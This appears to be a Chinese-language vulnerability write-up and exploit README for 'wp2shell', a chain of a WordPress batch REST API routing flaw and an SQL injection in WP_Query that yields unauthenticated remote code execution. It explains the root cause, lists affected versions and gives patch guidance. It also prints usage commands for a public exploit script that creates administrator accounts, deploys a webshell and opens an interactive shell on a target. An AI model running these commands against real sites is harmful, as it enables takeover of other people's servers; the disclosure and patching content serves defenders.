TL;DR —— 未经身份验证的攻击者可以将 WordPress REST API 批量路由缺陷与
WP_Query中的 SQL 注入链接起来,在默认的 WordPress 安装上实现完整的远程代码执行——无需插件、无需账户、无需用户交互。由 Adam Kues(Assetnote / Searchlight Cyber)发现,并将其命名为 wp2shell。已于 2026 年 7 月 17 日在 6.9.5、7.0.2 和 6.8.6 中修复。
CVE-2026-63030 是 WordPress 核心的 REST API 批量端点(/wp-json/batch/v1)对失败的子请求处理不当,以致后续子请求在错误的路由下被分发。单独来看,这是一个逻辑缺陷。与 CVE-2026-60137(WP_Query 中 author__not_in 参数的 SQL 注入)链接后,就变成了未经身份验证的远程代码执行。
WordPress 将 CVE-2026-63030 评定为 严重(Critical),将 CVE-2026-60137 评定为 高危(High);第三方 CVSS 评分因跟踪机构而异(分别约为 7.5 和 9.1),因为这两个单一评分都无法完全反映该 漏洞链 的实际危害。无论你看到的是哪个单一数字,都请将其视为严重——WordPress 认为其严重程度足以对所有受影响站点强制自动更新。
根本原因——批量记账失步。 当批量中的子请求未通过验证时,产生的 WP_Error 会被记录到内部 $validation[] 数组中——但用于路由的并行 $matches[] 数组并未同步更新。这一项的错位使后续每个子请求都偏移一个位置:子请求 N 最终被分发给本应属于子请求 N+1 的路由处理器。
输入净化绕过。 在从未被路由到的处理器下运行时,子请求会跳过该处理器自身的输入验证——包括类型检查和 is_array() 检查。
SQL 注入。 这一错位使攻击者控制的输入以原始字符串而非数组的形式到达 WP_Query 的 author__not_in 参数。本应拒绝它的 is_array() 防护永远不会执行,因此该值被直接插值到 NOT IN (...) 子句中。
入侵路径。 该注入仅支持 SELECT——不支持堆叠查询——但在数据库用户拥有 FILE 权限的主机上,这足以将 PHP webshell 写入 Web 根目录。在无法利用该权限的情况下,同一注入点可以改为通过盲注/UNION 注入转储 wp_users 表以获取管理员密码哈希。无论哪种方式:无需账户、无需插件、无需用户交互。
sequenceDiagram
participant A as Attacker
participant B as Batch Handler
participant Q as WP_Query
participant D as MySQL
A->>B: POST /wp-json/batch/v1 (crafted multi-request batch)
Note over B: Failed sub-request recorded in one internal array but not the other — indexes drift by one
B->>B: Sub-request N dispatched with sub-request N+1's route handler
Note over B: Wrong handler context — that route's input validation never runs
B->>Q: author__not_in passed as raw string, not array
Note over Q: is_array() guard skipped
Q->>D: SELECT ... WHERE post_author NOT IN (attacker string)
alt DB user has FILE privilege
D-->>A: Writes PHP webshell to web root → RCE
else No FILE privilege
D-->>A: Blind/UNION injection dumps admin password hashes
end
git clone htttps://github.com/GhostInExile/CVE-2026-63030-Wp2Shell
cd CVE-2026-63030-Wp2Shell
pip install -r requirements.txt
python3 CVE-2026-63030.py -t https://target.com --test
# Auto-generate credentials
python3 CVE-2026-63030.py -t https://target.com --create-admin
# Custom credentials
python3 CVE-2026-63030.py -t https://target.com --create-admin -u myadmin -p mypassword
# Auto-create admin, deploy shell, execute single command
python3 CVE-2026-63030.py -t https://target.com --shell -c "whoami"
# Interactive shell mode
python3 CVE-2026-63030.py -t https://target.com --shell -i
# Use existing credentials
python3 CVE-2026-63030.py -t https://target.com --shell -U admin -P password -c "id"
# Cleanup after shell session
python3 CVE-2026-63030.py -t https://target.com --shell -c "whoami" --cleanup
# Cleanup only (requires shell URL from previous session)
python3 CVE-2026-63030.py -t https://target.com --cleanup \
-U created_admin -P password \
--shell-url "https://target.com/wp-content/plugins/maint-xxx/maint-xxx.php"
# Use proxy
python3 CVE-2026-63030.py -t https://target.com --test --proxy http://127.0.0.1:8080
# Custom timeout
python3 CVE-2026-63030.py -t https://target.com --test --timeout 60
| WordPress 版本 | SQL 注入(CVE-2026-60137) | 路由混淆(CVE-2026-63030) | 实际风险 |
|---|---|---|---|
| < 6.8.0 | — | — | 不受影响 |
| 6.8.0 – 6.8.5 | ✅ | — | 仅 SQL 注入——需要插件/主题将不可信输入传入 author__not_in;单靠核心无法在预认证状态下触达。无论如何请打补丁。 |
| 6.9.0 – 6.9.4 | ✅ | ✅ | 未经身份验证的 RCE |
| 7.0.0 – 7.0.1 | ✅ | ✅ | 未经身份验证的 RCE |
| 7.1 Beta 1 | ✅ | ✅ | 未经身份验证的 RCE(Beta 通道) |
GHSA-ff9f-jf42-662q(路由混淆)· GHSA-fpp7-x2x2-2mjf(SQL 注入)CVE-2026-63030)——由 Assetnote / Searchlight Cyber 的 Adam Kues 通过 WordPress 的 HackerOne 项目报告。CVE-2026-60137)——由 TF1T、dtro 和 haongo 以团队形式单独报告。6.9.5、7.0.2、6.8.6 或更高版本——这是唯一完整的修复方案。WordPress 已对受影响站点启用强制自动更新;请确认你的站点确实已应用,而不是想当然。/wp-json/batch/v1 和 ?rest_route=/batch/v1。仅为应急措施——这可能会破坏合法的批量 API 使用(例如基于块的编辑),并且不能替代打补丁。